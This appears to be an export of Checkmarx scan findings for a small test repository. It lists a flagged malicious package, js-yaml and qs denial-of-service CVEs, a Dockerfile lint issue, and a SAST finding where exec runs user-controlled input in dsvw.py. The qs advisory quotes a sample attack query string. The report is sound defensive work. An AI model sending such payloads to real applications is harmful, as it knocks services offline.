Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: MEDIUM
State: NOT_IGNORED
Status: NEW

Scan ID: 853146fc-fdfe-41da-acda-485e520b7041

Upgrade to version: 2.10.5

Checkmarx One
Review in Checkmarx: CVE-2020-2875

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxfd197ca1-b64b
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process, analysis is done at scale automatically via multiple engines. Once there's a risk suspicion, this is forwarded to a security researcher for a manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It's a common behavior for most of the malicious payloads to execute itself automatically upon installing or using the package.

While some dependency vulnerabilities have the privilege to be kept as known issue due to risk-management, same does not apply in the case of a malicious package, and it should be removed with the highest priority.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxec49316b-56df
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

The package js-yaml before 3.13.0 is vulnerable to Denial of service as the function storeMappingPair() in file lib/js-yaml/loader.js, doesn't limit the user supplied yaml, causing the map key to grow exponentially. giving out a huge amount of output data, leading to denial of service due to excessive memory usage. This affects the availability.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 3.13.1

Checkmarx (KICS): Multiple RUN, ADD, COPY, Instructions Listed
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: NEW

Multiple commands (RUN, Copy, And) should be grouped in order to reduce the number of layers.

Scan ID: 853146fc-fdfe-41da-acda-485e520b7041

Expected value: The 'Dockerfile' contains any 'USER' instruction
Actual value: The 'Dockerfile' does not contain any 'USER' instruction"

Checkmarx One
Review in Checkmarx: Multiple RUN, ADD, COPY, Instructions Listed

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2022-24999
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

The qs package as used in Express through 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an "__ proto__ key" can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as "a[proto]=b&a[proto]&a[length]=100000000". This vulnerability affects qs versions through 6.2.3, 6.3.0 through 6.3.2, 6.4.0, 6.5.0 through 6.5.2, 6.6.0, 6.7.0 through 6.7.2, 6.8.0 through 6.8.2, 6.9.0 through 6.9.6 and 6.10.0 through 6.10.2 (and therefore Express 4.17.3, which has "deps: [email protected]" in its release description, is not vulnerable).

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 6.2.4

Checkmarx (SAST): Code_Injection
Security Issue: Read More about Code_Injection
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13

The application's do_GET method receives and dynamically executes user-controlled code using exec, at line 57 of /dsvw.py. This could enable an attacker to inject and run arbitrary code.

The attacker can inject the executed code via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Result #1:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]
    5. exec: /dsvw.py[57,21]
    Review result in Checkmarx One: Code_Injection

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxc73fdf59-ac18
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package downloads a harmful file.
File hash:
2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.

Additional Info